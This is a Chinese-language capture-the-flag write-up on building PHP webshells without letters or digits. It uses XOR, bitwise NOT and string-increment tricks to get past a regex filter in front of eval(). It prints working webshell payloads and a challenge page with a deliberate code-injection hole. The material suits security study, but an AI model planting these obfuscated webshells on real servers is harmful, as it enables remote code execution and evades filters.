PHP無字母數字構造Webshell

題目

index.php：

<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>40){ //檢測字元長度
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9]+/",$code)){ //限制字母和數字
        die("NO.");
    }
    @eval($code); //$code的值要為非字母和數字
}
 
else{
    highlight_file(__FILE__);
}
//$hint =  "php function getFlag() to get flag";
?>

flag.php：

<?php
	function getFlag(){
		$flag = "111111111111111111";
		echo $flag;
};
?>

解題過程

方法一

在PHP中，兩個字串執行異或操作以後，得到的還是一個字串。所以，我們想得到a-z中某個字母，就找到某兩個非字母、數字的字元，他們的異或結果是這個字母即可。

<?php
 

    var_dump('#'^'|'); //得到字元 _
    var_dump('.'^'~'); //得到字元 P
	var_dump('/'^'`'); //得到字元 0
	var_dump('|'^'/'); //得到字元 S
	var_dump('{'^'/'); //得到字元 T
	$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
	//變數$__值為字串'_POST'
?>

websell：

<?php
@$_++; //$_=NULL=0  $_++=1
$__=("#"^"|").("."^"~").("/"^"`").("|"^
 
"/").("{"^"/"); //_POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

為了節省字元長度，這裡字元可以一起異或使用

<?php
var_dump("#./|{"^"|~`//"); //_POST
var_dump("`{{{"^"?<>/"); //_GET
?>

webshell：

<?php
@$_++;
$__='#./|{'^'|~`//';
${$__}[!$_](${$__}[$_]);
?>

答案

$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=getFlag
    
$_="`{{{"^"?<>/"; //_GET
${$_}[_](${$_}[__]); //$_GET[_]($_GET[__])
&_=getFlag //執行函式 eval("getFlag(null)")

webshell：
$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=phpinfo()

其他型別答案

如果在加上不能有&_字元呢？

只要eval函式執行了“getFlag()”字串即可，那麼繞過正則匹配即可：

把getFlag取反然後URL編碼：

?code=$_=~%98%9A%8B%B9%93%9E%98;$_();

這裡為什麼正則沒有檢測到，因為後端自動進行了解碼，解碼為非字母和數字字元，而eval執行了取反還原為getFlag字元。

既然可以利用取反~進行編碼繞過正則檢測，那麼也可以取反編碼 $_GET、$_POST。

方法二

使用的是位運算裡的“取反”,利用UTF-8編碼的某個漢字，並將其中某個字元取出來。

<?php
$__=('>'>'<')+('>'>'<'); //True+True=2;$__=2
$_=$__/$__; //$_=2/2=1
$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
$_=$$_____;
$____($_[$__]);
?>

方法三

參考：

http://www.thespanner.co.uk/2012/08/21/php-nonalpha-tutorial/

原理：

利用php特性，在處理字串變數的算術運算時，PHP沿襲了Perl的習慣，而非C的。如： $a='Z';$a++;結果$a的值為’‘AA’，而在C中，變為’’{’,(‘Z’的ASCII值是90，而’{'的ASCII值為91)。注意字元變數只能遞增，不能遞減，並且只支援純字母（a-z A-Z）。

那麼如何拿到字串’a’的變數呢？

陣列（Array）的第一個字母就是大寫A，而且第4個字母是小寫a。也就是說，我們可以同時拿到小寫和大寫A，等於我們就可以拿到a-z和A-Z的所有字母。

在PHP中，如果強制連線陣列和字串的話，陣列將被轉換成字串，其值為Array：再取這個字串的第一個字母，就可以獲得’A’了。

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);